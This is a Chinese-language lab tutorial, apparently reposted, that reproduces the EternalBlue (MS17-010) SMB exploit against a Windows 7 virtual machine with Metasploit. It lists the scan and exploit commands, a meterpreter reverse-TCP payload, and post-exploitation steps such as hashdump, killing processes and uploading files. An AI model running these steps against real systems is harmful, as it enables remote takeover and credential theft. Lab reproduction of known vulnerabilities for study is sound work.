介绍
永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wanna cry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
(备注:大家不要随意在网上下载使用wanna cry勒索病毒)
测试环境靶机以及渗透工具
Vmware Workstation(虚拟机):
kali:Metasploit(msf) ip:192.168.1.139
windows7 ip:192.168.1.222
(注意:必须在同一个网段下)
两个系统一定要相互ping通
ping不通的话你就别玩了~~
进入msf控制台:输入msfconsole +回车
注意: 图案不一样不要紧,每次的图案都是随机的
可以先search ms17-010 查找一下漏洞 ms17-010是漏洞编号,画横线的地方不用管
可以先使用smb漏洞扫描一下此ip地址是否有ms17-010漏洞
msf6 > use auxiliary/scanner/smb/smb_ms17_010 #扫描是否存在smb_ms17-010漏洞
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.222 #设置目标主机
rhosts => 192.168.1.222
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit #运行 表示存在漏洞
[+] 192.168.1.222:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.222:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
检测到存在,继续下一步
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
#进入windows漏洞利用模块下面ms17
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options #查看需要配置什么
配置RHOSTS (这是目标主机地址)LHOST(本机地址)LPORT(本机地址监听端口)
其他都是默认的,这三个都得配,如果还想了解更多,请翻译后面的英文
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.222
#这里大小写无所谓,最好大写,配置目标主机地址
rhosts => 192.168.1.222
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.139
lhost => 192.168.1.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
#端口只要在65535以内并且需要空闲端口,即可设置
lport => 4444
设置一个payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
此设置用于逆向拿shell,这里设置了一个tcp协议
一切准备就绪>>>>>>>>>>>>>>>>>>>>>>>>
exploit 运行
只要不报错基本就成功了
这里可以 hashdump一下 查看系统用户
可以看到两个用户(Administrator、Guest)并且密码一致(这里的密码是指加密后的)
ps可查看系统进程,可以随便kill杀掉
可以从kali上上传一些文件并运行文章来源:https://www.toymoban.com/news/detail-467633.html
(备注:想破坏他人计算机系统的再次提醒!本文章只用作技术交流及讨论!请遵纪守法!)文章来源地址https://www.toymoban.com/news/detail-467633.html
到了这里,关于win7系统smb永恒之蓝【漏洞复现】的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!